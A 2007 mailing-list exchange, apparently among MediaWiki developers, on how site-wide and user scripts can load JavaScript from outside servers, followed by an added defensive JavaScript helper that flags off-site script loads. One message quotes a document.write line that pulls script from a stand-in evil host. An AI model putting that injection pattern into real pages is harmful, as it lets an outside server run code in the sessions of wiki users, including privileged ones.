On 9/4/07, Domas Mituzas <midom.lists(a)gmail.com> wrote:
By not seeing this, you guys confirm that this should not be enabled ;-)
Domas, it seems you're out of touch with the actual current behavior.
Right now anyone that can edit the site wide scripts can insert a
document.write('<script src="http://evilserver.comr.com... and the
script loaded as a result of that can then have ongoing communication
with the user by itself inserting more script tags, which call a
callback function with the result data.
So you've made a case for limiting control of the proxy functionality
to sysops... but not more than that.
No, it applies to all user scripts. I doubt that every user who is including
them in their profile is doing a security audit of the JavaScript.
Only if user is including them in his profile. Other users can't
include anything into user's profile.
Any sysop can. Any sysop can also edit the site wide, or throw a
script into MediaWiki ns thus making it available withjs.
And if your concern is "wikipedia account integrity" you're wrong to
dismiss userscripts. Some are very very popular and are used by many
accounts with elevated rights, for example:
http://en.wikipedia.org/w/index.php?title=Special:Whatlinkshere/User:Lupin/…
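
Added example, not part of the original message: a small audit helper that scans site-wide or user script source for script loads resolving to hosts outside an allowlist, which is the pattern the message describes. The allowlist, base URL and sample input are constructed assumptions; `importScriptURI` is the MediaWiki helper for loading a script by URL.

```javascript
// Added example: flag script loads in wiki JavaScript that point off-site.
// BASE and ALLOWED_HOSTS are assumptions chosen for illustration.
const BASE = "http://en.wikipedia.org/";
const ALLOWED_HOSTS = new Set(["en.wikipedia.org"]);

// The ways one script can pull in another script by URL.
const PATTERNS = [
  { kind: "script-tag", re: /<script[^>]*\bsrc\s*=\s*\\?["']?([^"'\\\s>]+)/gi },
  { kind: "src-assignment", re: /\.src\s*=\s*["']([^"']+)["']/g },
  { kind: "importScriptURI", re: /importScriptURI\(\s*["']([^"']+)["']/g },
];

function findExternalScriptLoads(source, allowed = ALLOWED_HOSTS) {
  const findings = [];
  source.split("\n").forEach((text, i) => {
    for (const { kind, re } of PATTERNS) {
      for (const m of text.matchAll(re)) {
        let host;
        try {
          // Resolves relative paths and protocol-relative //host URLs.
          host = new URL(m[1], BASE).hostname;
        } catch (e) {
          host = null; // unparsable URL: report it rather than skip it
        }
        if (host === null || !allowed.has(host)) {
          findings.push({ line: i + 1, kind, url: m[1], host });
        }
      }
    }
  });
  return findings;
}

// Constructed sample input (not taken from any real wiki page).
const SAMPLE = [
  "importScriptURI('http://en.wikipedia.org/w/index.php?title=User:Example/tool.js&action=raw');",
  "document.write('<script src=\"http://thirdparty.example/x.js\"><\\/script>');",
  "var s = document.createElement('script');",
  "s.src = '//cdn.example/cb.js?callback=handle';",
  "s.src = '/w/local.js';",
].join("\n");

for (const f of findExternalScriptLoads(SAMPLE)) {
  console.log(`line ${f.line}: ${f.kind} -> ${f.host} (${f.url})`);
}
```

A textual scan like this misses URLs assembled at run time by string concatenation, so it narrows a review of popular scripts rather than replacing one.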